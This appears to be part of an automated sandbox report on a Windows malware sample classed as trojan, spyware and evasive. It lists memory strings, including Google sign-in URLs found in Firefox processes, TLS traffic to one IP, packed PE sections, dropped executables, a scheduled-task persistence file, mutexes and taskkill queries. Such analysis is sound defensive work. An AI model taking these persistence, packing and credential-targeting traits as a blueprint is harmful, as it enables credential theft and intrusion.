Source: file.exe, 00000000.00000003.1711563084.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2485074230.000000000559C000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2638368744.0000000005973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001B.00000002.2725658450.0000000A4E94B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgsqlite_temp_master
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171944000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B79700A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 0000001B.00000003.2679591143.000001C1774F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C178089000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001B.00000003.2678449963.000001C1780DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001B.00000002.2719893448.0000000A46FD8000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/accoSt?=https://a
Source: firefox.exe, 00000020.00000002.2720468138.000002B796E60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig
Source: firefox.exe, 00000020.00000002.2720880731.000002B796EAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000019.00000002.2577497195.000001A424CB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2590723298.000001446A807000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2732087108.000001C1649C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000020.00000002.2720880731.000002B796EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdI
Source: firefox.exe, 0000001B.00000002.2734125620.000001C1667EA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2734125620.000001C166828000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2722821711.0000015475E50000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2727612952.0000015476184000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2720468138.000002B796E64000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2720880731.000002B796EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMozElements.MozEleme
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdh
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58655 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58661 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58644 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 58620 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown Network traffic detected: HTTP traffic on port 58645 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown Network traffic detected: HTTP traffic on port 58684 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown Network traffic detected: HTTP traffic on port 58690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58656 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58659
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58656
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58655
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58658
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58663
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58665
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58661
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 58651 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 58686 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 58700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58640 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58672
Source: unknown Network traffic detected: HTTP traffic on port 58692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58652 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58684
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58687
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58686
Source: unknown Network traffic detected: HTTP traffic on port 58691 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58680
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58680 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58624 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 58663 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58618 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58692
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58691
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58693
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58690
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 58709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58629 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58616
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58618
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58617
Source: unknown Network traffic detected: HTTP traffic on port 58687 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58621
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58620
Source: unknown Network traffic detected: HTTP traffic on port 58641 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58627
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58629
Source: unknown Network traffic detected: HTTP traffic on port 58647 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58623
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58624
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58631
Source: unknown Network traffic detected: HTTP traffic on port 58658 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58623 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58641
Source: unknown Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58640
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58643
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58642
Source: unknown Network traffic detected: HTTP traffic on port 58617 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58659 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58653 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58649
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58645
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58644
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58647
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58652
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58651
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58654
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58653
Source: unknown Network traffic detected: HTTP traffic on port 58642 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58631 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58654 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 58708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58708
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58700
Source: unknown Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58665 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58616 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown Network traffic detected: HTTP traffic on port 58627 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58720
Source: unknown Network traffic detected: HTTP traffic on port 58643 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58649 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58621 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown Network traffic detected: HTTP traffic on port 50101 -> 443
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49868 version: TLS 1.2

System Summary

barindex
Source: 275df0ca27.exe, 0000000C.00000002.2617209511.0000000000AF2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_31ee3440-3
Source: 275df0ca27.exe, 0000000C.00000002.2617209511.0000000000AF2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_f670f2b3-d
Source: 275df0ca27.exe, 00000021.00000000.2706701885.0000000000AF2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_d581d412-5
Source: 275df0ca27.exe.8.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_94b37426-1
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name:
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name: .idata
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name:
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: .idata
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name:
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: 1171a5b648.exe.8.dr Static PE information: section name:
Source: 1171a5b648.exe.8.dr Static PE information: section name: .rsrc
Source: 1171a5b648.exe.8.dr Static PE information: section name: .idata
Source: 1171a5b648.exe.8.dr Static PE information: section name:
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name:
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name: .idata
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name:
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name: .idata
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name:
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: .idata
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name:
Source: num[1].exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011C33CC 0_3_011C33CC
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe A8ADDC675FCC27C94FF9E4775BB2E090F4DA1287AAE6B95CECC65CCF533BC61D
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.1833557458.000000000610B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9980285070532915
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: Section: ZLIB complexity 0.998020265667575
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: Section: bleglpjp ZLIB complexity 0.9942190613503985
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.998020265667575
Source: skotes.exe.3.dr Static PE information: Section: bleglpjp ZLIB complexity 0.9942190613503985
Source: random[1].exe.8.dr Static PE information: Section: ZLIB complexity 0.9980285070532915
Source: 6cadd3f0fd.exe.8.dr Static PE information: Section: ZLIB complexity 0.9980285070532915
Source: random[1].exe0.8.dr Static PE information: Section: usisoqoi ZLIB complexity 0.9949866959291486
Source: 1171a5b648.exe.8.dr Static PE information: Section: usisoqoi ZLIB complexity 0.9949866959291486
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: Section: ZLIB complexity 0.998020265667575
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: Section: bleglpjp ZLIB complexity 0.9942190613503985
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@84/34@101/14
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2144:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
